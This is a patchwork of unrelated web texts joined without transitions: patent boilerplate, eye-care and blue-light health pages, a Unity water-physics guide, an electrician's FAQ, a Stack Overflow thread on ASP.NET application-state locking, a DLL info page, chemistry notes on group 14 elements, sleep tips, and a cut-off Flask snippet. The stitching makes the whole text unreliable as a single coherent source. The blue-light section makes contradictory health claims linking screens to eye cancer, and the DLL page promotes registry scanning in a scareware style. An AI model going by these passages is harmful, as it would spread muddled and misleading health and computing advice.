instances, well-known structures, materials, or operations are not shown or described in detail to avoid obscuring the description. Reference throughout this specification to "one embodiment" or "an embodiment" means that a particular feature, structure, or characteristic described in connection with the embodiment is included in at least one embodiment of the present invention. Thus, the appearances of the phrases "in one embodiment" or "in an embodiment" in various places throughout this specification are not necessarily all referring to the same embodiment. Furthermore, the particular features, structures, or characteristics may be combined in any suitable manner in one or more embodiments. In addition, embodiments of the present description may be implemented not only within a semiconductor chip but also within machine-readable media. For example, the designs described above may be stored upon and/or embedded within machine-readable media associated with a design tool used for designing semiconductor devices. Examples include a netlist formatted in the VHSIC Hardware Description Language (VHDL), Verilog or SPICE languages. Some netlist examples include: a behavioral level netlist, a register transfer level (RTL) netlist, a gate level netlist and a transistor level netlist. Machine-readable media also include media having layout information such as a GDS-II file. Furthermore, netlist files or other machine-readable media for semiconductor chip design may be used in a simulation environment to perform the methods of the teachings described above. Thus, embodiments of this invention may be used as or to support a software program executed upon some form of processing core (such as the CPU of a computer) or otherwise implemented or realized upon or within a machine-readable medium. A machine-readable medium includes any mechanism for storing or transmitting information in a form readable by a machine (e.g., a computer).
For example, a machine-readable medium can include a read-only memory (ROM), a random access memory (RAM), magnetic disk storage media, optical storage media, a flash memory device, etc. In addition, a machine-readable medium can include propagated signals such as electrical, optical, acoustical or other forms of propagated signals (e.g., carrier waves, infrared signals, digital signals, etc.). The above description of illustrated embodiments of the invention, including what is described in the Abstract, is not intended to be exhaustive or to limit the invention to the precise forms disclosed. While specific embodiments of, and examples for, the invention are described herein for illustrative purposes, various equivalent modifications are possible, as those skilled in the relevant art will recognize. These modifications can be made to embodiments of the invention in light of the above detailed description. The terms used in the following claims should not be construed to limit the invention to the specific embodiments disclosed in the specification and the claims. Rather, the scope is to be determined entirely by the following claims, which are to be construed in accordance with established doctrines of claim interpretation.
Inflammation can be a serious problem when it happens in the eyes. It leaves the eyes open to infection and is uncomfortable for the person dealing with it. However, an eye doctor in Miami can help those who suffer constant eye inflammation in a number of different ways. The first part of treating someone's eye inflammation is figuring out what is causing it in the first place. People can develop inflamed eyes because of dryness, other diseases, and the things they do throughout the day. Visiting a Miami optometrist and discussing your inflammation issues is the first step to stopping your eyes from being inflamed on a daily basis. Ways to Treat Eye Inflammation If someone is dealing with constant eye inflammation, they will likely need a prescription from an eye doctor in Miami. There are special drugs that can reduce the amount of swelling in the eyes, allowing someone to get through the day without constant rubbing and discomfort. ● Using corticosteroid eye drops. There are special eye drops containing steroids that patients can use to reduce their inflammation. Some of these eye drops also contain antibiotics that help prevent infections. ● Using non-steroidal anti-inflammatory eye drops. These eye drops also reduce inflammation, but they do not contain any steroids. ● Over-the-counter eye drops. Some eye drops that can be bought from the store without a prescription are satisfactory for treating some people's eye inflammation. Search for a product that specifically states it helps with inflammation and try it out. Other Things That Can Help Decrease Inflammation In addition to getting eye drops that can help with inflammation, people who are prescribed eyeglasses in Miami Beach should wear them as often as possible. Wearing the glasses prevents someone from putting strain on their eyes, reducing their risk of inflammation. There are also certain diets people can try that are high in antioxidants and fatty acids, which are essential to good eye health. Finding out which foods may cause inflammation is also beneficial for people who aren't aware of how their diet can affect the health of their eyes.
What Is Blue Light? A Complete Scientific Guide Blue light is part of the electromagnetic spectrum that humans can see. It has wavelengths between roughly 380 and 500 nanometers, making it one of the shortest-wavelength, highest-energy bands of visible light. About a third of the visible light spectrum is made up of blue light. Most blue light comes from the sun, but fluorescent light bulbs, LED TVs and computer screens, mobile phones, and tablets all give off blue light as well; these are human-made sources. Although it is often associated with electronic equipment, the sun is by far the most significant source of blue light. Human-made lighting options that emit it include CFLs, regular fluorescents, and LEDs. The amount of blue light produced by screens is significantly less than that produced by the sun, and it is also safer than the blue light in direct sunlight. Growths, cataracts, and eye cancers are just three conditions that may be caused by exposure to UV radiation. Compared to other colors, blue light is one we still need more information about; research into its consequences continues. Does Blue Light Make You Healthier? Researchers have found that blue light makes people more alert, improves brain function and memory, and lifts mood. Whether you are aware of it or not, it helps control whether you feel alert or sleepy (the circadian cycle). Young children also benefit from being in the light because it helps their eyes and vision develop. How bad is it to be in blue light? Compared to being outside in the sun, screens give off only a small amount of blue light. But there are worries about the long-term effects of spending too much time in front of screens, especially when screens are too close and directly in front of the eyes for long periods. 80% of American adults use digital devices for more than 2 hours daily, and about 77% of them use more than one device simultaneously. More than half of the people who use computers have some digital eye strain. Blue light is hard for our eyes to block, so almost all of it passes through the lens and cornea to the retina, which turns light into an image the brain can understand. If you are exposed to intense blue light for a long time, it could hurt the cells in your retina. This could lead to macular degeneration and other vision problems as you age. It has also been linked to eye cancer, cataracts, and growths on the cornea, the clear cover that protects the front of the eye. A study on eye health and vision by the National Eye Institute found that children's eyes are much more susceptible than adults' eyes to the blue light that electronic devices give off. When using a digital device, a person tends to blink less, which can lead to dry eyes and more strain on the eye. Strained eyes can become irritated, and headaches and shoulder and neck pain are also common. The Vision Council says that 27% to 35% of adults in the U.S. have had at least one of these symptoms when using electronic devices. How does blue light affect the ability to fall asleep? Even though there are a lot of studies about blue-light glasses, there is not yet a clear answer. But they can lessen the effect that blue light has on the eyes. Those who need to spend considerable time in front of a computer screen can ease the strain on their eyes by wearing glasses that block blue light. Blue-light-blocking glasses worn during the day have been shown to help people get to sleep, stay asleep, and sleep better.
Blue-light-filtering lenses can reduce harmful effects by 10–23% without affecting the quality of the image. Lenses with yellow tints can help people who use digital devices for long periods feel more comfortable. The amount of blue light we receive also influences when our bodies begin producing melatonin; as a result, avoiding blue light in the hours leading up to bedtime may improve the quality of sleep. Disrupting the circadian rhythm has been linked to prevalent diseases, including type 2 diabetes, cancer, heart disease, sleep disorders, and cognitive issues. Hence, for sound sleep, it is better to avoid using electronic devices such as mobile phones and laptops before going to bed. Use glasses that block blue light It has been shown that protecting your eyes from blue light during the day can help with the onset, maintenance, and quality of sleep. Blue light can tire the eyes, but generic lenses that block the blue wavelength can reduce the strain by 10–23% without lowering image quality. Putting yellow-tinted lenses between you and your computer screen can make it easier to look at for long periods. You can also put a blue-light filter on your phone, tablet, and computer. The filters, which stop most of the blue light that would otherwise reach your eyes, don't noticeably change how clear the screen is. Conclusion The portion of the electromagnetic spectrum that appears blue is present in natural settings, and the sun is the primary source of most of the blue light you see. However, some medical specialists believe that exposure to blue light from artificial sources can harm the eyes. Experiments on animals have demonstrated that intense exposure to blue light damages cellular health. Not much data suggests that the blue light emitted by electronic devices such as tablets, smartphones, and LED televisions harms people's eyes. However, if you are required to sit in front of a computer for an extended period for school or work, you should take frequent breaks to prevent your eyes from becoming weary. If you use electronic devices at night, switch them to an amber light mode or put them away at least an hour before you sleep. Exposure to blue light has been shown to disrupt the body's natural sleep-wake cycle.
Quick Start This quick start guide explains how to set up a primitive sphere to interact with water. An empty scene is used for the example. Initial Project Setup Project Settings > Player > Api Compatibility Level needs to be set to .NET 4.x. Assembly Definitions Since all the NWH assets have been updated to use assembly definitions, here is a disclaimer to avoid confusion when updating: This asset uses Assembly Definition (.asmdef) files. There are many benefits to assembly definitions, but a downside is that the whole project needs to use them or they should not be used at all. • If the project already uses assembly definitions, a script that belongs to this asset can be accessed by adding a reference to the assembly definition of the script that needs to reference the asset. E.g. to access AdvancedShipController, adding a NWH.DWP2 reference to MyProject.asmdef is required. • If the project does not use assembly definitions, simply remove all the .asmdef files from the asset after import. Using, for example, Lux Water (which does not feature assembly definitions) will therefore require either adding an .asmdef file inside the Lux Water directory and a reference inside NWH.DWP2.asmdef, or removing all .asmdef files from the asset if you do not wish to use assembly definitions. Some assets such as Crest already feature .asmdefs, and adding Crest as a reference to NWH.DWP2 is the only step needed. Water Object Manager WaterObjectManager has been removed in v2.5. All the settings and simulation are now handled by the WaterObject. Water Object Any physics object that is active and has a WaterObject attached will interact with water. There are two requirements for WaterObject to work: a Rigidbody and a MeshFilter: • MeshFilter is required so that the WaterObject knows which mesh to use for simulation. • Rigidbody does not have to be attached to the same object as WaterObject, but it must be present in one of its parents. This allows for composite objects: one Rigidbody with multiple hulls - such as a trimaran. Example Manual Setup 1. Add a 3D Object ⇒ Sphere to the scene. 2. Add a Sphere Collider to the Sphere if it is not automatically added. 3. Add a Rigidbody to the Sphere and set its mass to 300. There is also a script called MassFromMaterial which can calculate and set the Rigidbody mass based on material density and mesh volume, but it is a helper script and not required. 4. Add WaterObject to the Sphere. Since the sphere by default has 768 triangles, the Simplify Mesh option should be used. This option automatically decimates the mesh to a Target Triangle Count. A good triangle count is 30 or less for simple objects and around 60 for ship hulls. Using a higher triangle count will have only a minor influence on simulation quality but carries a linear performance penalty (doubling the triangle count will roughly halve the performance). Therefore, reducing the triangle count until the object starts to lose its shape is recommended. In the case of the example sphere, 36 will be enough: Example Auto Setup 1. Add a 3D Object ⇒ Sphere to the scene. 2. Attach WaterObjectWizard to the sphere and press Auto-Setup. Example WaterObject setup. Water Data Provider WaterDataProvider is a script that tells WaterObject where the water is. It is an interface between water systems/assets and DWP2 and allows the two to communicate.
All flat water assets/shaders use the same WaterDataProvider, FlatWaterDataProvider, while for wavy assets such as Crest an asset-specific WaterDataProvider has to be used, e.g. CrestWaterDataProvider. As of version v2.5, an option to use multiple water surfaces in the same scene has been added. This is done by attaching a Collider with isTrigger = true to the WaterDataProvider. As long as an object is inside the trigger, it will use data from that WaterDataProvider. Minimal Setup 1. Add a Cube (or any other mesh) to the scene. 2. Attach WaterObject to the Cube. Make sure that a Rigidbody has been added. 3. Press Play. The object will now float at the default water height (set under WaterObject settings). Adding Water To add water to the scene, check the Water Assets page. FlatWaterDataProvider can be used to make the water height follow a flat primitive plane, which results in something like this: A basic primitive plane used as water. Water Particle System WaterParticleSystem can be used to generate foam. It works with any flat water. 1. Drag DefaultWaterParticleSystem from DWP2 ⇒ Resources into the scene and parent it to the Sphere. Example WaterParticleSystem setup. 2. Move the Sphere to be above the water and press Play. The Sphere falling into the water will generate foam around it based on simulation data. WaterParticleSystem and ParticleSystem values can be tweaked to suit the needs of the project. Center Of Mass CenterOfMass is a simple script that offsets the center of mass of a Rigidbody. Unity calculates the center of mass of an object from all of its colliders, as if the object were homogeneous. In many cases this is not correct - a ship has ballast, a crate could have some load in it, a barrel could have oil, etc. To adjust the center of mass of an object, simply attach the CenterOfMass script to the same object that contains the Rigidbody and adjust the Center Of Mass Offset - a value in local coordinates which tells how much to offset the center of mass from the Unity-calculated point. Want a ship to be less prone to capsizing? Lower the Y component of COM. CenterOfMass inspector. Water Object Wizard WaterObjectWizard is a helper script that sets up a WaterObject automatically. It is still recommended to understand the manual setup and how things work, but this script can automate and speed up the setup process. A primitive Sphere will be used, same as in the rest of the guide above. 1. Add a 3D Object > Sphere to the scene. 2. Add WaterObjectWizard to the newly created Sphere. 3. Tick Add Water Particle System (optional). This option is self-explanatory. 4. Click Auto-Setup and press Play after the setup is done. The Sphere now floats and generates foam. The next step would be to manually check and tweak the default values, such as Target Triangle Count, center of mass, etc. The same manual setup can also be scripted, as sketched below.
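For completeness, here is what the manual setup steps could look like when done from code rather than the Inspector. This is a hedged sketch: WaterObject is the component name used throughout this guide, but the NWH.DWP2 namespace is only inferred from the assembly-definition note above, so verify both against the installed asset. The mass of 300 simply mirrors the example.

    using UnityEngine;
    using NWH.DWP2; // assumed namespace, per the .asmdef reference mentioned earlier

    public class SphereWaterSetup : MonoBehaviour
    {
        void Start()
        {
            // Steps 1-2: a primitive sphere already comes with a MeshFilter
            // and a SphereCollider.
            GameObject sphere = GameObject.CreatePrimitive(PrimitiveType.Sphere);

            // Step 3: the Rigidbody may live on this object or on a parent.
            Rigidbody rb = sphere.AddComponent<Rigidbody>();
            rb.mass = 300f; // or let a MassFromMaterial-style helper derive it

            // Step 4: WaterObject picks up the MeshFilter automatically;
            // Simplify Mesh / Target Triangle Count (about 36 for this sphere)
            // are then adjusted in the Inspector as described above.
            sphere.AddComponent<WaterObject>();
        }
    }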
 FAQ Faraday Electrics Ltd 0115 9894024 07811 286635 [email protected] Do I have to wait all day for your electrician? No, we provide 2-hour time slots for our electrician to arrive. The vast majority of call-out work can be completed in less than an hour. Do you provide free quotations? For larger projects such as lighting design, house rewires etc. we will provide you with a free quotation. Obviously, it is not cost-effective for us to send someone to quote for a repair. In that instance we charge per hour, with a 1-hour minimum charge. Are your electricians qualified? Yes, all our electricians are NAPIT or NICEIC qualified. Is Faraday Electrics Ltd insured? Yes, we carry £5 million worth of insurance. Is your work guaranteed? All our work carries a one-year no-quibble warranty on defective parts. The NICEIC insurance-backed warranty covers work undertaken by contractors registered to the NICEIC Installer Scheme. Will you have the electrical part for my repair? Our electricians carry a lot of electrical parts – fuses, spare lights, switches, wire, cables etc. We certainly aim to carry a wide range of parts to enable us to fix and replace faulty parts and get your electrical system working as quickly as possible. However, with the diversity of electrical systems and RCD units, it is just not possible to carry every part that you might come across. What's involved in rewiring a house? A rewire is the most disruptive and invasive work that a property can undergo. Every room will need to have the following carried out: In addition, rewiring the lighting upstairs requires the loft to be cleared to gain access to the lighting points and to each switch drop. We are experienced at making the rewire as hassle- and mess-free as possible. What is an RCD (Residual Current Device)? RCD stands for Residual Current Device. They used to be called ELCBs (Earth Leakage Circuit Breakers). They are usually fitted as standard to most domestic consumer units in houses built after around 1980. They tend to protect only certain parts of the distribution panel wiring (e.g. the kitchen or utility ring main), in a so-called "split-load" consumer unit. They are designed to quickly trip and interrupt the supply to the circuit they are protecting when an imbalance is detected between the neutral and live (in the case of an RCD) or when there is a current in the earth wire of the protected circuit above a pre-set limit (usually 30mA), in the true ELCB. You can also purchase "plug-in" RCDs, ideal for mowers, vacuums, and hairdryers, and an RCD plug, for things like shower pumps. Although the primary protection is the fuse in the plug, fuses do not blow for some fault conditions; they are there mainly to protect the wiring and the appliance from overloads. The RCD is ideal to protect the user from electric shocks and earth leakage faults. My RCD on the consumer unit trips out, what do I do? If this is a solid fault (i.e. it won't reset), it is most likely due to a plugged-in appliance that has developed a fault. The most likely culprit is the washing machine, dishwasher or tumble dryer. Try unplugging each one in turn until the RCD remains latched in the "ON" state. If it is not one of those items and your freezer is also on the same circuit, then try unplugging that too. If the problem remains, use an extension lead plugged into a socket in another room (on a circuit not affected) as a temporary measure until you locate the faulty appliance.
Other likely culprits are the kettle and a steam iron (usually anything that comes into contact with water!). However, don't forget that even small things like radio alarm clocks, phone chargers and mains adaptors can cause the RCD to trip out, so check all your items. If you still cannot find the problem, call in a professional electrician. Why do I need a Landlord's Electrical Safety Certificate? As a Landlord, it is important to ensure that all electrical appliances and fittings within the property you rent out are safe. However, unlike gas regulations, there is no legislation that demands you must have a landlord electrical safety certificate. That said, should any electrical fittings or appliances within your rental property cause actual harm to the tenant, you could be held liable. In the worst-case scenario, your tenant could sue you for damages or you might be brought before a court for negligence under the Electrical Equipment (Safety) Regulations 1994. Why would I want a Visual Electrical Inspection? If you are purchasing a new flat or house, you may find a Visual Electrical Inspection helpful. This report can give you a reasonable indication of the state of the electrical system in the property. This may help you make an informed decision on whether to purchase the property or whether to negotiate for a discount! It can save the expense of a full electrical safety certificate and inspection, which is a far more expensive and time-consuming process. What is a Periodic Inspection? A Periodic Inspection Report (PIR) is an electrical test on the condition of the electrical wiring, installations and electrical connections such as accessories, light switches and electric sockets within a property. The electrical installation – such as the wiring in a house – is tested against current electrical safety standards. The report lists any faults, possible concerns, and potential problems that need further investigation. The PIR report also provides a timescale of urgency within which action should be taken. The electrical test itself does not attempt to repair any of the problems that may be highlighted. The report can be used to decide whether to budget for any remedial works or additional investigation. What is Part 'P' of the building regulations? Since 2005, if you're doing work to your home that involves electricity, it needs to be covered by 'Part P' of the Building Regulations. That's the law. It means whoever is carrying out the work needs to follow rules that make sure the work protects you and your family from fire or electric shock. It's designed to keep you and your family as safe as possible. This applies if you're putting electricity into a new house or extension, or if you're having an existing system adapted or rewired. You can find full details on Part P on the Communities and Local Government website, www.communities.gov.uk. Faraday Electrics Ltd is a registered Part P installer. The advantages of this are: What does Part P of the Building Regulations mean to me? If you use Faraday Electrics Ltd, you can expect to have safe electrical work done, as the work will meet the UK national standard, BS 7671 (Requirements for Electrical Installations). When the work is finished you will receive: What should I do if I'm unsure about electrical safety? You should contact a fully qualified electrician, such as Faraday Electrics Ltd, who will be happy to reassure you and visit your premises if need be.
All the views and opinions expressed on this page are given for guidance only and are our interpretation of hypothetical circumstances; we cannot accept any liability for any actions taken as a result of this guidance. We strongly recommend that all electrical work is designed, installed, maintained and tested by a suitably qualified electrician. As always with electrical installation work, you should consult a suitably qualified person.
My application stores two related bits of data in application state. Each time I read these two values, I may (depending on their values) need to update both of them. So to prevent updating them while another thread is in the middle of reading them, I'm locking application state. But the documentation for the HttpApplicationState.Lock method really doesn't tell me exactly what it does. For example: 1. How does it lock? Does it block any other thread from writing the data? 2. Does it also block read access? If not, then this exercise is pointless, because the two values could be updated after another thread has read the first value but before it has read the second. In addition to preventing multiple threads from writing the data at the same time, it is helpful to also prevent a thread from reading while another thread is writing; otherwise, the first thread could think it needs to refresh the data when it's not necessary. I want to limit the number of times I perform the refresh.

Accepted answer: Looking at the code, Lock() locks only the writes, not the reads.

public void Lock() { this._lock.AcquireWrite(); }

public void UnLock() { this._lock.ReleaseWrite(); }

public object this[string name]
{
    get { return this.Get(name); }
    set { this.Set(name, value); } // here is the effect of the lock
}

public void Set(string name, object value)
{
    this._lock.AcquireWrite();
    try { base.BaseSet(name, value); }
    finally { this._lock.ReleaseWrite(); }
}

public object Get(string name)
{
    object obj2 = null;
    this._lock.AcquireRead();
    try { obj2 = base.BaseGet(name); }
    finally { this._lock.ReleaseRead(); }
    return obj2;
}

Each individual write and read is already thread safe, meaning the lock mechanism is built in. So if you are going on a loop where you read data, you can take the lock outside it to prevent others from breaking the list. It is also good to read this answer: Using static variables instead of Application state in ASP.NET. It is better to avoid using Application state to store data and to use a static member with your own lock mechanism directly, first because Microsoft suggests it, and second because reading and writing the Application's static data takes the internal lock on every access. A minimal sketch of that recommended pattern follows this exchange.

Comments: • If so, there doesn't appear to be any way to keep my two data items synchronized when being read except to store the two items in the same object. – Jonathan Wood Oct 26 '12 at 23:09 • @JonathanWood I say that you can lock when you are going to read data, to prevent others from writing to and changing it. All the rest is synchronized already and thread safe. – Aristos Oct 26 '12 at 23:10 • Can you tell me how the lock works? Does _lock.AcquireWrite() block any other threads trying to write? – Jonathan Wood Oct 26 '12 at 23:16 • @JonathanWood Yes, that is what it does. (It is internal signaling code, not a standard public function.) – Aristos Oct 26 '12 at 23:17 • @JonathanWood Take a look also at this answer: stackoverflow.com/a/10964038/159270 – Aristos Oct 26 '12 at 23:29
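To make the recommended alternative concrete, here is a minimal sketch of the two related values kept in static fields behind a single ReaderWriterLockSlim, so a reader always sees the pair consistently and only upgrades to a write lock when a refresh is really needed. All names and the refresh rule are illustrative, not from the original question.

using System.Threading;

public static class PairedState
{
    private static readonly ReaderWriterLockSlim Gate = new ReaderWriterLockSlim();
    private static int _first;
    private static int _second;

    // Note: only one thread may hold the upgradeable lock at a time; readers
    // that never refresh could use EnterReadLock/ExitReadLock instead and
    // still see a consistent pair.
    public static void ReadAndMaybeRefresh(out int first, out int second)
    {
        Gate.EnterUpgradeableReadLock();       // writers are blocked from here on
        try
        {
            if (NeedsRefresh(_first, _second))
            {
                Gate.EnterWriteLock();         // now readers are blocked too
                try
                {
                    _first = LoadFirst();
                    _second = LoadSecond();
                }
                finally { Gate.ExitWriteLock(); }
            }
            first = _first;
            second = _second;                  // both values from one consistent view
        }
        finally { Gate.ExitUpgradeableReadLock(); }
    }

    // Placeholders for the application's own rules and data sources.
    private static bool NeedsRefresh(int a, int b) { return a > b; }
    private static int LoadFirst() { return 0; }
    private static int LoadSecond() { return 1; }
}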
Feedback Mechanisms Regulate the Rate of Enzyme Activity: related sources and excerpts. • Nuclear receptors rock around the clock (EMBO Reports). • Pearson, The Biology Place (phschool.com), Glossary of Biological Terms: "pacemaker: a specialized region of the right atrium of the mammalian heart that sets the rate of contraction; also called the sinoatrial (SA) node." • Bile acid synthesis, metabolism and biological functions: "The end products of cholesterol utilization are the bile acids. Indeed, the synthesis of the bile acids is the major pathway of cholesterol catabolism in mammals." • Tubuloglomerular feedback, an overview (ScienceDirect Topics): "Tubuloglomerular feedback is an adaptive mechanism that links the rate of glomerular filtration to the concentration of salt in the tubule fluid at the macula densa."
ssctui.dll Application using this process: Siebel Enterprise Applications Recommended: Check your system for invalid registry entries. What is ssctui.dll doing on my computer? ssctui.dll is a module belonging to Siebel Enterprise Applications from Siebel Systems, Inc. Non-system processes like ssctui.dll originate from software you installed on your system. Since most applications store data in your system's registry, it is likely that over time your registry suffers fragmentation and accumulates invalid entries, which can affect your PC's performance. It is recommended that you check your registry to identify slowdown issues. In order to ensure your files and data are not lost, be sure to back up your files online. Using a cloud backup service will allow you to safely secure all your digital files. This will also enable you to access any of your files, at any time, on any device. Is ssctui.dll harmful? ssctui.dll has not been assigned a security rating yet; it is unrated. Can I stop or remove ssctui.dll? Most non-system processes that are running can be stopped because they are not involved in running your operating system. Scan your system now to identify unused processes that are using up valuable resources. ssctui.dll is used by 'Siebel Enterprise Applications', an application created by 'Siebel Systems, Inc.'. To stop ssctui.dll permanently, uninstall 'Siebel Enterprise Applications' from your system. Uninstalling applications can leave invalid registry entries, which accumulate over time. Is ssctui.dll CPU intensive? This process is not considered CPU intensive. However, running too many processes on your system may affect your PC's performance. To reduce system overload, you can use the Microsoft System Configuration Utility to manually find and disable processes that launch upon start-up. Why is ssctui.dll giving me errors? Process-related issues are usually caused by problems encountered by the application that runs it. A safe way to stop these errors is to uninstall the application and run a system scan to automatically identify any PC issues.
nisd.domain.name This configuration parameter specifies the NIS domain name for the adnisd process to use when communicating with NIS clients. For example, to specify that you want to use euro-all as the NIS domain name in the zone named Europe-00-Zone, you can set this parameter as follows: nisd.domain.name: euro-all If this parameter is not defined in the configuration file, the zone name is used by default.
Carbon Group Elements Group 14 Elements The carbon group consists of the six chemical elements that make up group 14 of the periodic table: carbon (C), silicon (Si), germanium (Ge), tin (Sn), lead (Pb), and flerovium (Fl). The properties of the carbon group elements and their compounds are intermediate between those of the elements of the adjacent boron and nitrogen groups. The ground-state electronic configurations of the carbon group elements show that each has four electrons in its outermost shell. If n represents the outermost shell (where n is 2 for carbon, 3 for silicon, and so on), then these four electrons are represented by the symbols ns2np2. Elements belonging to group 14 show an oxidation state of +4, and the heavier elements also show +2 due to the inert pair effect. This page covers the periodic properties of the carbon family; let's briefly discuss the individual properties of carbon, silicon, germanium, tin, lead, and flerovium. Carbon Group Periodic Table All the carbon family elements are familiar in daily life, either in pure elemental form or in the form of compounds, except germanium and the artificially produced flerovium; and except for silicon and carbon, none is abundant in the Earth's crust. Carbon forms a great variety of compounds in both the plant and animal kingdoms. Silicon and its minerals are a fundamental component of the Earth's crust; silica (silicon dioxide) is the main constituent of sand. Germanium forms few minerals of its own and is mostly found in small concentrations in the mineral zinc blende and in coals. Even though germanium is one of the rarer elements, it is important because of its semiconductor properties. Common carbon-containing molecules include carbon dioxide (CO2) and methane (CH4). Carbon Carbon is the fourth most abundant element in the universe by mass and occurs naturally as anthracite (a type of coal), graphite, and diamond. Symbol: C Atomic Number: 6 Atomic Mass: 12.0107 u Carbon is central to organic chemistry, as it is the distinguishing feature of an organic compound. It is also unique among the elements in its ability to form strongly bonded chains, terminated by hydrogen atoms, and it is considered the "backbone" of biology, as all life forms on Earth are carbon-based. This is due to its small size and its unique electron configuration: since carbon atoms are small, their p-orbital electrons overlap considerably and enable π bonds to form. Impure carbon, in the form of charcoal (from wood) and coke (from coal), is used in metal smelting, most commonly in the iron and steel industries. Graphite is used in pencils, in brushes for electric motors, and in furnace linings. Activated charcoal is used for purification and filtration and can be found in respirators. Carbon fibre finds application as a very strong, lightweight material, currently used in tennis rackets, skis, fishing rods, rockets, and airplanes.
Silicon Symbol: Si Atomic Number: 14 Atomic Mass: 28.0855 u Silicon is the second most common element in the Earth's crust (after oxygen) and is considered the backbone of the mineral world. It is classified as neither metal nor nonmetal but as a metalloid. Silicon is relatively inert, reacting primarily with halogens. Silicon plays a much smaller role in biology, though it may have functioned as a catalyst in the formation of the earliest organic molecules. Plants depend heavily on silicates to hold nutrients in the soil, where their roots can absorb them. Silicon (primarily as silica, SiO2) has been used for millennia in the creation of ceramics and glass. If carbon can be considered the backbone of human intelligence, silicon can be considered the backbone of artificial intelligence. Silicon can be found in sandy beaches and is also a major component of concrete and brick. • Being a semiconductor, it is used to make transistors. • It is most commonly used in computer chips and solar cells. • It can be used in the production of fire bricks. • Most waterproofing systems use silicones as a component. • Silicon is used in many moulds and moulding compounds. • It is also a component of ferrosilicon, an alloy commonly used in the steel industry. Germanium Symbol: Ge Atomic Number: 32 Atomic Mass: 72.64 u Germanium is a rare element used in the manufacture of semiconductor devices. Its physical and chemical properties are somewhat similar to those of silicon. It is gray-white in colour and forms a crystal structure. Germanium is a semiconductor that, when doped with arsenic and other elements, can be used as a transistor in electronic applications. Germanium oxides have a high index of refraction and dispersion, which makes them well suited for wide-angle camera lenses and objective lenses for microscopes. Germanium can also be used as an alloying agent, in fluorescent lamps, and as a catalyst. Both germanium and germanium oxide are transparent to infrared radiation, so they are used in infrared spectroscopes. Stannum Symbol: Sn Atomic Number: 50 Atomic Mass: 118.71 u Tin is a soft, malleable metal with a low melting point. It has two solid-state allotropes at ordinary temperatures and pressures, denoted α and β. At higher temperatures (above 13°C), tin exists as white tin, the metallic form often used in alloys. At lower temperatures it can transform into gray tin, losing its metallic properties and turning powdery. Tin shows chemical similarity to both of its neighbours in group 14, germanium and lead, and has two main oxidation states, +2 and the slightly more stable +4. • White tin is used to plate steel food cans in order to prevent them from rusting. Tin is malleable, ductile, and crystalline; it has many isotopes, ten of which are stable, the largest number of any element, and it is a superconductor at low temperatures. • It is used in tin plating, coating and polishing, as it has a high resistance to corrosion. • It is widely used in solders because of its low melting point. • It is used in the manufacture of alloys such as bronze, an alloy of tin and copper. • It is used as a reducing agent and as a mordant in dyeing, and in glass, ceramics, and sensors. • In the shipping industry, it has been used as an anti-fouling agent for boats and ships. • In the form of stannous chloride (SnCl2), it is employed in some dental products.
• It finds application in the electrodes of batteries such as Li-ion batteries. • It is widely used in the manufacture of steel food containers. Tin in organic form (organotin compounds) is the most dangerous to human health and can cause severe effects such as eye and skin irritation, headaches, sickness, dizziness, breathlessness, and severe sweating, among other problems. Plumbum Symbol: Pb Atomic Number: 82 Atomic Mass: 207 u Lead, a very soft, silvery-white or grayish metal, is similar to tin in that it is a soft, malleable metal with a low melting point. It was widely used in water and sewage pipes. Lead is toxic to human health, especially to children: even very low-level exposure can cause nervous system damage and can prevent proper production of haemoglobin (the molecule in red blood cells responsible for carrying oxygen through the body). Lead is stable in the +2 and +4 oxidation states. Its oxides have multiple industrial uses, for example as oxidizing agents and as cathodes in lead-acid storage cells. Lead sheets and other parts made from lead compounds are used in heavy and industrial machinery to dampen noise and vibration. Flerovium Symbol: Fl Atomic Number: 114 Atomic Mass: 289 u Flerovium (Fl) was discovered in 1998 by scientists in Dubna. It is radioactive and very short-lived: the longest-lived isotope of flerovium has an atomic weight of 289 and a half-life of 0.97 seconds, while three other isotopes have half-lives of 0.52, 0.51, and 0.16 seconds respectively. Conclusion Here, we have studied the carbon family elements and some of their uses and properties. The elements of this group are carbon (C), silicon (Si), germanium (Ge), tin (Sn), lead (Pb), and flerovium (Fl). Carbon is used almost everywhere, whereas flerovium is radioactive and too short-lived for practical use. FAQs on Carbon Group Elements Q1. Carbon belongs to which group? Why can carbon form a very large number of compounds? Answer: Carbon belongs to group 14. It can form a very large number of compounds because each carbon atom can form four chemical bonds to other atoms, and the small carbon atom fits readily as part of very large molecules. Its tendency to bond with other carbon atoms into chains is called catenation. Q2. Explain the properties of carbon. Answer: Three properties of carbon are: (a) Catenation: Carbon has a unique tendency to form bonds with other carbon atoms, giving rise to large molecules. (b) Tetravalency: Carbon has a valency of four, so it is capable of bonding with four other carbon atoms or atoms of some other monovalent element. (c) Isomerism: Compounds with identical molecular formulas but different structural formulas are called isomers, and the property is known as isomerism. Q3. Write some physical properties of diamond. Answer: Some physical properties of diamond are: 1. It is extremely hard and has a very high melting point. 2. It has a high relative density and is transparent to X-rays. 3. It has a high refractive index and is a bad conductor of electricity. 4. It is a good conductor of heat and is insoluble in all solvents.
Do You Suffer from Sleep Debt? With stress and uncertainty running rampant these days, we understand better than most that it's affecting everyone's quality of life in some way. For a lot of people, this can mean not getting enough good sleep. But did you know that if you get a few poor nights of sleep in a row, it takes more than just one good night of sleep to make up for it? That's where 'sleep debt' comes in. Think of your sleep hours as a bank. If you need 8 hours of sleep each night to feel good and rested, but have a few nights each week where you're only getting 5 hours of sleep, you're in a 'sleep debt' of several hours. So, what can you do to improve your sleep debt? Give these tips a try for a better night's rest. • Avoid taking naps during the day. Naps don't give our bodies the same rejuvenation we get from a full night of sleep. While they feel nice, if you have trouble sleeping at night, you'll want to skip them during the day to set yourself up for success. • Don't eat after dinner. Some studies indicate that eating meals or simply snacking too close to bedtime can cause us to toss and turn and wake up more than usual. Instead of snacking before bed, redirect your urge to a different activity, like walking or reading. • Keep a sleep schedule. This means going to bed at the same time each night and waking at the same time each morning. This will help your body get into a routine and, eventually, sleep more easily and soundly. • Add more exercise into your day. People who work out regularly often sleep better! That doesn't mean you need to suddenly begin an intense routine; if you're not very active currently, start by adding a brisk 30-minute walk to your day and build momentum from there.
How to use jac (jinja-assets-compressor) in Flask together with Flask-User

If you use Flask-User in your Flask application, jac may not work out of the box. The flask_static_compress package doesn't help either: it contains little more than a reference to jac's Flask contrib file, which is funny.

Problem: how to make it work.

First, initialize jac in your init_app function. If you don't have one, creating the app once and initializing extensions there is a clean pattern:

import os
from flask import Flask
from jac.contrib.flask import JAC
from jac.compat import u  # jac's text helper, as used in jac/contrib/flask.py upstream

app = Flask(__name__)
jac = JAC()

